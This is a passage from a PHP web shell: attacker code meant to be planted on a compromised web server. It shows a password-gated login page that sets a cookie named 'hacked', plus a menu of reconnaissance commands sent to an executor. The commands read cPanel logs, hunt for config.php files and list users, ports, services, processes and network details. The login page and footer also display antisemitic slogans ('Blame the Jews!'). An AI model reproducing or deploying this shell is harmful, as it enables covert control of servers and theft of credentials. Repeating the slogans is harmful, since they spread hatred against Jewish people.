6147 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
6148 </SELECT>
6149 <?php } else {?>
6150 <SELECT NAME="mycmd" class="box">
6151 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
6152 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
6153 <OPTION VALUE="systeminfo">System Informations
6154 <OPTION VALUE="net user">User accounts
6155 <OPTION VALUE="netstat -an">Open ports
6156 <OPTION VALUE="getmac">Get Mac Address
6157 <OPTION VALUE="net start">Show running services
6158 <OPTION VALUE="net view">Show computers
6159 <OPTION VALUE="arp -a">ARP Table
6160 <OPTION VALUE="tasklist">Show Process
6161 <OPTION VALUE="ipconfig/all">IP Configuration
6162
6163 </SELECT>
6164 <?php } ?>
6165 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
6166<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
6167</form>
6168</td>
6169</tr></table><br>
6170
6171</td>
6172</tr>
6173</table>
6174
6175<?php
6176
6177
6178//logout
6179
6180if(isset($_GET['logout']))
6181{
6182 setcookie("hacked",time() - 60*60);
6183 header("Location:$self");
6184 ob_end_flush();
6185}
6186?>
6187
6188
6189<hr color="#1B1B1B">
6190<div align="center">
6191<font size="6" face="Times New Roman, Times, serif" color="#00CC00">Hail<br>
6192-Blame the Jews!-</font></div>
6193<?php
6194}
6195}
6196
6197if(isset($_POST['uname']) && isset($_POST['passwd']))
6198{
6199 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
6200 {
6201 setcookie("hacked", md5($pass));
6202 $selfenter = $_SERVER["PHP_SELF"];
6203 header("Location:$selfenter");
6204 }
6205}
6206
6207if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
6208{
6209 shellstyle();
6210?>
6211 <center>
6212 <form method="POST">
6213 <div style="background-color:#171717; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
6214 <table cellpadding="9" cellspacing="4">
6215 <tr>
6216 <td align="center" colspan="2"><blink><font size="7"><b>Jew</b></font></blink></td>
6217 </tr>
6218 <tr>
6219 <td align="right"><b>User Name : </b></td>
6220 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6221 </tr>
6222 <tr>
6223 <td align="right"><b>Password : </b></td>
6224 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
6225 </tr>
6226 <tr>
6227 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
6228 </tr>
6229 <tr>
6230 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>-Blame the Jews!-</b></font></td>
6231 </tr>
6232 <tr>
6233 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the Jew</noscript></font></td>
6234 </tr>
6235 </table>
6236 </div>
6237
6238 </form>
6239 </center>
6240<br>
6241</body>
6242</html>
6243<?php
6244}
6245?>